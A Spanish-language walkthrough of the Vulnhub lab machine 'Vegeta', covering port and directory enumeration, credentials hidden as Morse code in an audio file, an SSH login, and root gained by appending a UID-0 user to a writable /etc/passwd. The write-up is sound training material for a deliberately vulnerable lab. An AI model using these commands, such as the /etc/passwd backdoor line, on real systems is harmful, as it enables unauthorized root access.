[VLN] Vegeta

Hoy vamos a hackear la maquina de Vulnhub llamada Vegeta.Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/vegeta-1,501/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    sml@Cassandra:~$ nmap -A -p- 192.168.1.100 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-29 13:26 CEST Nmap scan report for Vegeta.home (192.168.1.100) Host is up (0.00043s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA) | 256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA) |_ 256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519) 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-server-header: Apache/2.4.38 (Debian) |_http-title: Site doesn't have a title (text/html). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds
    sml@Cassandra:/usr/share/seclists/Discovery/Web-Content$ gobuster dir -u http://192.168.1.100 -w directory-list-2.3-big.txt -x php,html =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.100 [+] Threads: 10 [+] Wordlist: directory-list-2.3-big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php,html [+] Timeout: 10s =============================================================== 2020/06/29 13:29:26 Starting gobuster =============================================================== /index.html (Status: 200) /img (Status: 301) /login.php (Status: 200) /image (Status: 301) /admin (Status: 301) /manual (Status: 301) /server-status (Status: 403) /bulma (Status: 301) /logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQf sclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0Q QsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsore finesearchZ1.html (Status: 403) =============================================================== 2020/06/29 13:47:52 Finished ===============================================================
    Vemos un directorio interesante: /bulma Al visitarlo podemos encontrar un fichero .wav, el cual nos descargamos. Una vez descargado, visitamos la siguiente pagina: https://morsecode.world/international/decoder/audio-decoder-adaptive.html Hacemos el upload del audio, y finalmente nos muestra: USER : TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL) Parece que son las credenciales :) Vamos a probar!
  • Low Shell
  • sml@Cassandra:~$ ssh trunks@192.168.1.100 trunks@192.168.1.100's password: Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72 trunks@Vegeta:~$
    Ahora que estamos dentro del sistema, investigamos un poco mas...
    trunks@Vegeta:~$ cat .bash_history perl -le 'print crypt("Password@973","addedsalt")' echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh] echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd ls su Tom ls -la cat .bash_history sudo apt-get install vim apt-get install vim su root cat .bash_history exit
    Vemos que en el "history" tiene comandos donde intenta modificar el fichero /etc/passwd para agregar al usuario Tom, con UID Y GID 0 (como root). Echamos un vistazo a los permisos de /etc/passwd.
    trunks@Vegeta:~$ ls -l /etc/passwd -rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd
    Vemos que el usuario trunks tiene permisos para escribir. Sabiendo esto, ejecutamos el comando que aparece en el history para crear al usuario Tom, y luego nos logueamos como Tom para tener la cuenta de root!
  • Privilege Escalation
  • Ejecutamos el siguiente comando para agregar Tom al sistema...
    trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
    Nos logueamos como Tom.. (pass Password@973).
    trunks@Vegeta:~$ su Tom Password: root@Vegeta:/home/trunks#
  • root.txt
  • root@Vegeta:/home/trunks# cd /root root@Vegeta:~# ls root.txt root@Vegeta:~# cat root.txt , ,'| ,/|.-' \. .-' ' |. , .-' | /|,' |' / ' | , / ,'/ . | _ / \`' .-. ,' `. | \ / \ / \ / \| V | | , ( ) /.--. ''"/ "b.`. ,' _.ee'' 6)| ,-' \"= --"" ) ' /.-' \ / `---" ."|' V E G I I T A \"..- .' |. `-__..-',' | _.) ' .-'/ /\. .--'/----..--------. _.-""-. .-') \. / _..-' _.-'--. / -'/ """"""""" ,'-. . `. | ' / / ` `. \ | | | | | \ .'\ | \ | / ' | ,' . - \`. | / / / / | | `/"--. -' /\ | | \ \ / \ | | \ | \ .-| | | Hurray you got root Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw
  • End
  • Y con esto ya seriamos root de la maquina :)